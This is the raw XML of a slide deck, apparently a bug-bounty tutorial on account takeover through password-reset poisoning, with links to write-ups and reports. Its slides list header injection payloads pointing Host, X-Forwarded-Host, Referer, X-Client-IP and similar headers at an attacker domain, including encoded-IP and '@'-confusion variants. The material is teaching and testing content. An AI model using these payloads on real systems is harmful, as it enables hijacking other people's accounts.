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Lato"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
      <p:italic r:id="rId64"/>
      <p:boldItalic r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
      <p:italic r:id="rId68"/>
      <p:boldItalic r:id="rId69"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular r:id="rId70"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald"/>
      <p:regular r:id="rId71"/>
      <p:bold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Oswald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swald-regular.fntdata"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack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6.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-italic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePr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SourceCodePr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b3ae97b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b3ae97b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cb3ae97b2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cb3ae97b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ce3ec257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ce3ec25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30203dab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30203dab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ce55eb6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ce55eb6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2a521bf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2a521bf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c689164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ac689164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ce3ec257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ce3ec257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bfad4d9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bfad4d9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fb2edf1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fb2edf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3728174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3728174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0203dab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30203dab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c6891640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c689164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d030546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ad030546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ac6891640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ac6891640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ac6891640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ac6891640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ac6891640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ac6891640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ac6891640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ac6891640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30204005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30204005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3020400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302040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b5aea10a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b5aea10a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b87ba946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b87ba94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30203dab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30203dab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ce3ec2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ce3ec2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b161339c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b161339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ad030546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ad030546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30203dab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30203dab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30204005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30204005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30204005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30204005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ace3ec257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ace3ec257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30204005f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30204005f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a30203da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a30203da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ace55eb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ace55eb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30203dab9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30203dab9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c6891640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c6891640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e3728174e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e3728174e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e3728174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e3728174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e3728174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e3728174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e3728174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e3728174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e3728174e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e3728174e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30204005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30204005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a30204005f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a30204005f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ce3ec257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ce3ec257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ad0305462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ad0305462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e3ec257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ce3ec257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e3728174e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e3728174e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ace3ec257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ace3ec257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ad0305462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ad0305462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e3728174e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e3728174e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5aea10a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5aea10a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acb3ae97b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acb3ae97b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ce3ec257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ce3ec25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30203dab9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30203dab9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5aea10a8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5aea10a8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d0305462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d0305462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www.slideshare.net/sergeybelove/attacking-thru-http-host-header" TargetMode="External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hyperlink" Target="https://0xayub.gitbook.io/blog/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www.anugrahsr.me/posts/10-Password-reset-flaws/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de8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V8f6gqrCbZU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www.slideshare.net/sergeybelove/attacking-thru-http-host-header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www.anugrahsr.me/posts/10-Password-reset-flaws/" TargetMode="External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twitter.com/malcolmx0x/status/1176586046810644480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medium.com/@abhishake100/password-reset-poisoning-to-ato-and-otp-bypass-1a3b0eba5491" TargetMode="External"/><Relationship Id="rId7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medium.com/@sechunter/ato-via-host-header-poisoning-dc5c29d2fd0d" TargetMode="External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0xayub.gitbook.io/blog/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hyperlink" Target="https://www.youtube.com/watch?v=zP4b3pw94s0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twitter.com/sin_khe/status/1242428505142562819" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bilalmerokhel/pwn-them-all-bugbounty-4ee60e13c83" TargetMode="External"/><Relationship Id="rId12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twitter.com/Agarri_FR/status/965196958011920384" TargetMode="External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hyperlink" Target="https://hackerone.com/reports/72733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hyperlink" Target="https://hackerone.com/reports/698416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portswigger/param-miner" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Sh1Yo/x8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mokhansec.medium.com/full-account-takeover-worth-1000-think-out-of-the-box-808f0bdd8ac7" TargetMode="External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www.slideshare.net/sergeybelove/attacking-thru-http-host-header" TargetMode="External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hyperlink" Target="https://www.youtube.com/watch?v=zP4b3pw94s0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www.anugrahsr.me/posts/10-Password-reset-flaws/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/167631" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://0xayub.gitbook.io/blog/" TargetMode="External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hyperlink" Target="https://twitter.com/hunter0x7/status/1321149883764645891" TargetMode="External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hyperlink" Target="https://0xayub.gitbook.io/blog/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hyperlink" Target="https://www.anugrahsr.me/posts/10-Password-reset-flaws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twitter.com/akita_zen/status/1254898239653982211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hyperlink" Target="https://0xayub.gitbook.io/blog/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www.anugrahsr.me/posts/10-Password-reset-flaws/" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://0xayub.gitbook.io/blog/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hyperlink" Target="https://www.anugrahsr.me/posts/10-Password-reset-flaws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twitter.com/ADITYASHENDE17/status/1250319076510937094" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/1175081" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/322985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hyperlink" Target="https://0xayub.gitbook.io/blog/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www.anugrahsr.me/posts/10-Password-reset-flaws/" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://twitter.com/xlocux/status/1254929134561701889" TargetMode="External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hyperlink" Target="https://twitter.com/chiraggupta8769/status/1297102892135063552" TargetMode="External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hyperlink" Target="https://twitter.com/blanksecc/status/1277599304983687169" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/intigriti/status/1078318258661531648" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1318532648734773249" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/Haoneses/status/1292456202857742338" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=cThFNXrBYQU" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b1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zP4b3pw94s0" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anugrahsr.me/posts/10-Password-reset-flaws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hyperlink" Target="https://twitter.com/Debian_Hunter/status/1321511316507353089" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=V8f6gqrCbZU" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks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hyperlink" Target="https://gauravnarwani.com/a-tale-of-3-xss/" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/sunilyedla2/status/1339271046822678528" TargetMode="External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hyperlink" Target="https://twitter.com/w_hat_boy/status/1163168648447401984" TargetMode="External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hyperlink" Target="https://twitter.com/SalahHasoneh1/status/1293918353971531776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twitter.com/intigriti/status/1177178910397796353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hyperlink" Target="https://twitter.com/akita_zen/status/1254899416705699844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twitter.com/Fozisimi143/status/1360478619282378756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hyperlink" Target="https://twitter.com/xlocux/status/1254941466641784834" TargetMode="External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hyperlink" Target="https://medium.com/bugbountywriteup/unauthenticated-account-takeover-through-http-leak-33386bb0ba0b" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://footstep.ninja/posts/password-reset/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hyperlink" Target="https://medium.com/bugbountywriteup/broken-authentication-in-mobile-application-9f470513a4ab" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/jr0ch17/status/1252271108360998914" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/293490" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://avanishpathak46.medium.com/an-interesting-account-takeover-vulnerability-f5bf6a89152c" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cobalt.io/bypassing-the-protections-mfa-bypass-techniques-for-the-win-8ef6215de6ab" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/swlh/tale-of-multiple-account-takeover-on-single-platform-19c019b1d1cb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anugrahsr.me/posts/10-Password-reset-flaws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hyperlink" Target="https://twitter.com/11xuxx/status/1250764273623629826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zP4b3pw94s0" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://0xayub.gitbook.io/blog/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hyperlink" Target="https://www.anugrahsr.me/posts/10-Password-reset-flaws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hackerone.com/reports/898841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hyperlink" Target="https://twitter.com/xlocux/status/1254925916465246208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hyperlink" Target="https://www.anugrahsr.me/posts/10-Password-reset-flaws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hackerone.com/reports/96636" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@khaled.hassan/full-account-takeover-via-reset-password-function-8b6ef15f346f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hyperlink" Target="https://www.anugrahsr.me/posts/10-Password-reset-flaws/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twitter.com/xlocux/status/1254925916465246208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twitter.com/iambharat18/status/1252875115953418242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hyperlink" Target="https://bugreader.com/ahmad_halabi@idor-in-google-apis-194" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/th3insp3ct0r/status/1276550455171198976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hackerone.com/reports/42587" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://avanishpathak46.medium.com/an-interesting-account-takeover-vulnerability-a1fbec0e01a" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ashutoshmishra00x0.medium.com/account-takeover-via-reset-password-worth-2000-de085851d81d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hyperlink" Target="https://twitter.com/jae_hak99/status/1332888912885215232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twitter.com/M404ntf/status/1353194542309257216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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anugrahsr.me/posts/10-Password-reset-flaws/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=uDigwNal7GQ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hackerone.com/reports/6884" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/751581" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://twitter.com/HusseiN98D/status/1254888748216655872" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://www.anugrahsr.me/posts/10-Password-reset-flaws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medium.com/bugbountywriteup/bugbounty-how-i-was-able-to-compromise-any-user-account-via-reset-password-functionality-a11bb5f863b3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hyperlink" Target="https://medium.com/@mrnikhilsri/account-takeover-using-race-condition-6e1624231cae" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://medium.com/bugbountywriteup/bounty-tip-easiest-way-to-bypass-apis-rate-limit-f984fad40093" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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hyperlink" Target="https://thezerohack.com/hack-any-instagram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thezerohack.com/how-i-might-have-hacked-any-microsoft-account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thezerohack.com/hack-instagram-agai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www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html" TargetMode="External"/><Relationship Id="rId5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ithub.com/PortSwigger/turbo-intruder" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectdiscovery/nuclei" TargetMode="External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34.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.projectdiscovery.io/exploiting-race-conditons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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@fatnassifiras45/how-i-was-able-to-take-over-any-account-via-the-password-reset-functionality-ef1659f8b481" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xayub.gitbook.io/blog/" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://www.freecodecamp.org/news/responsible-disclosure-how-i-could-have-hacked-all-facebook-accounts-f47c0252ae4d/" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://logicbomb.medium.com/tale-of-3-vulnerabilities-to-account-takeover-44ba631a0304" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thezerohack.com/apple-vulnerability-bug-bounty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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hakluke/status/1300392121065594881" TargetMode="External"/><Relationship Id="rId5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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/N008x/status/1302515523557548032" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html" TargetMode="External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zP4b3pw94s0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zP4b3pw94s0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www.youtube.com/watch?v=gluSEBZpplQ" TargetMode="External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www.contextis.com/us/blog/server-technologies-reverse-proxy-bypass" TargetMode="External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68050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A T O</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6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Reset Password</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584900" y="2414638"/>
            <a:ext cx="3916500" cy="511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Email Address OR Mobile Number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Add Another Host Header e.g. Host: me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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23" name="Google Shape;323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Host: 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5" name="Google Shape;325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27" name="Google Shape;3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9" name="Google Shape;32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1" name="Google Shape;331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9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50" y="39341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9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6" name="Google Shape;336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43114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9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Add Another </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Space-surrounded </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host Header e.g.  Host:me.com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43" name="Google Shape;343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Host: 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44" name="Google Shape;344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5" name="Google Shape;345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47" name="Google Shape;3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 Host Header e.g. Host: me.com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Add X-Forwarded-Host Header Too e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Forwarded-Host: me.com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55" name="Google Shape;355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Host: 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X-Forwarded-Host: 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56" name="Google Shape;356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7" name="Google Shape;357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1" name="Google Shape;36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 Host Header e.g. Host: me.com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Add X-Forwarded-Host Header Too e.g. X-Forwarded-Host: company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To 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69" name="Google Shape;369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Host: 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X-Forwarded-Host: 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70" name="Google Shape;370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1" name="Google Shape;371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73" name="Google Shape;3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5" name="Google Shape;37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7" name="Google Shape;377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Add X-Forwarded-Host Header e.g. X-Forwarded-Host: company.com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Referer Header Too e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: https://me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To 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83" name="Google Shape;383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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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X-Forwarded-Host: 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Referer: https://me.com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84" name="Google Shape;384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5" name="Google Shape;385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87" name="Google Shape;3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9" name="Google Shape;38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Use Noun-Standard Headers e.g. X-Forwarded-For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X-Forwarded-Host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X-Client-IP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True-­Client-­IP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X-Originating-IP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> etc , To 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95" name="Google Shape;395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X-Forwarded-For: me.com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X-Forwarded-Host: me.com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X-Client-IP: me.com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X-Originating-IP: me.com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X­-WAP­-Profile: https://me.com/file.xml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True-­Client-­IP: me.com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Referer: https://me.com/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96" name="Google Shape;396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7" name="Google Shape;397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99" name="Google Shape;39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3" name="Google Shape;403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5" name="Google Shape;405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50" y="39341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4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8" name="Google Shape;408;p5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2925" y="43114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4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Use Noun-Standard Headers e.g. X-Forwarded-For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X-Forwarded-Host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X-Client-IP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True-­Client-­IP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X-Originating-IP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With Encoded IP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. 0177.1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15" name="Google Shape;415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X-Forwarded-For: 0177.1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X-Forwarded-Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0177.1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X-Client-IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0177.1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X-Originating-IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0177.1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X­-WAP­-Profile: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0177.1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/file.xml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True-­Client-­IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0177.1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Referer: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0177.1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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16" name="Google Shape;416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7" name="Google Shape;417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19" name="Google Shape;41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1" name="Google Shape;42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Use Noun-Standard Headers e.g. X-Forwarded-For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X-Forwarded-Host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X-Client-IP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True-­Client-­IP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X-Originating-IP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. company.com@me.com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27" name="Google Shape;427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X-Forwarded-For: www.company.com@me.com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X-Forwarded-Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.company.com@me.com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X-Client-IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.company.com@me.com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X-Originating-IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.company.com@me.com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X­-WAP­-Profile: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.company.com@me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/file.xml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True-­Client-­IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.company.com@me.com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Referer: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.company.com@me.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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28" name="Google Shape;428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9" name="Google Shape;429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31" name="Google Shape;4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Use Noun-Standard Headers e.g. X-Forwarded-For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X-Forwarded-Host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X-Client-IP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True-­Client-­IP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X-Originating-IP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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me.com/.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>company.com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39" name="Google Shape;439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X-Forwarded-For: me.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.company.com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X-Forwarded-Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com/.company.com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X-Client-IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com/.company.com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X-Originating-IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com/.company.com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X­-WAP­-Profile: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com/.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/file.xml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True-­Client-­IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com/.company.com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Referer: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me.com/.company.com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40" name="Google Shape;440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1" name="Google Shape;441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43" name="Google Shape;44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1" name="Google Shape;451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53" name="Google Shape;453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Figure Out Are There Others Parameters , By Using Burp Suite Extension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Called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param-miner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x8</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Guess Parameters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4" name="Google Shape;45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FUZZ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56" name="Google Shape;456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7" name="Google Shape;457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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
